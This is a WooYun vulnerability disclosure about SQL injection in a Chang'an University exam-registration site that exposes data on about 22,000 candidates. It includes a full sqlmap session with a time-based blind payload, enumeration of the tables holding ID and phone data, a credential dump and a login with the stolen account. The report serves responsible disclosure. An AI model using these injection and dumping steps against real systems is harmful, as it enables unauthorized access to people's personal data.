当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142560

漏洞标题:长安大学某分站sql注入(2w+考生敏感信息泄露)

相关厂商:CCERT教育网应急响应组

漏洞作者: 0error-0warning

提交时间:2015-09-22 22:36

修复时间:2015-11-07 08:28

公开时间:2015-11-07 08:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-10-03: 细节向核心白帽子及相关领域专家公开
2015-10-13: 细节向普通白帽子公开
2015-10-23: 细节向实习白帽子公开
2015-11-07: 细节向公众公开

简要描述:

全国专业技术人员计算机能力考试——长安大学考点报名系统2w+考生敏感信息泄露(包括身份证和手机号等)。

详细说明:

http://**.**.**.**:8080/bmxt/


10.png


D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?metho
d=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=123456' AND (SELECT * FROM (SELECT(SLEEP(5)))jRnE) AND 'gU
cO'='gUcO&password=123456&Submit=%B5%C7%C2%BC
---
[23:43:51] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12


D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?metho
d=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --dbs -
-batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
available databases [5]:
[*] bmxt
[*] information_scheqa
[*] mysql
[*] performance_schema
[*] tqst


D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?metho
d=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt
--tables --batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
Database: bmxt
[9 tables]
+----------+
| user |
| ad |
| admin |
| class |
| discuss |
| e1 |
| examtime |
| zheqgce |
| ziliao |
+----------+


D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?metho
d=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt
-T admin --columns --batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
Database: bmxt
Table: admin
[10 columns]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| adminname | varchar(20) |
| fqe_manage |
| gonggao_manage | varchar(5) |
| id | int(11) |
| mqssage_manage |
| password | varchar(20) |
| stu_date_mqnage |
| stu_manage | varchar(5) |
| sys_manage | varchar(5) |
| user_manage | varchar(5) |
+-----------------+-------------+


D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?meth
d=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmx
-T user --columns --batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
Database: bmxt
Table: user
[33 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| a1 | varchar(50) |
| a2 | varchar(50) |
| a3 | varchar(50) |
| a4 | varchar(50) |
| a5 | varchar(50) |
| a6 | varchar(50) |
| a7 | varchar(50) |
| address | varchar(50) |
| admin | varchar(50) |
| b1 | varchar(50) |
| b2 | varchar(50) |
| b3 | varchar(50) |
| b4 | varchar(50) |
| b5 | varchar(50) |
| b6 | varchar(50) |
| b7 | varchar(50) |
| baddress | varchar(50) |
| bk | varchar(50) |
| checkfee | int(11) |
| degree | varchar(50) |
| del | int(11) |
| dnum | varchar(50) |
| email | varchar(50) |
| examDate | varchar(50) |
| id | int(11) |
| identify_id | varchar(50) |
| password | varchar(50) |
| picname | varchar(50) |
| postcode | varchar(50) |
| telphone | varchar(50) |
| truename | varchar(50) |
| username | varchar(50) |
| yes | int(1) |
+-------------+-------------+


D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?metho
d=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --count
-D bmxt -T user –C "username,password"--batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[12:31:58] [INFO] resumed: 22171
Database: bmxt
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 22171 |
+--------+---------+


数据量太多了,只导一个看看。

D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?metho
d=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt
-T user –C "username,password" --stop 1 --dump --batch
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**


111.png


拿到了账号和密码,试试看。

11.png


12.png


成功登陆了,信息很丰富,被利用的话,很危险。

漏洞证明:

希望长安大学尽快修复,对考生负责。

修复方案:

版权声明:转载请注明来源 0error-0warning@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-23 08:26

厂商回复:

通知用户处理中

最新状态:

暂无


漏洞评价:

评论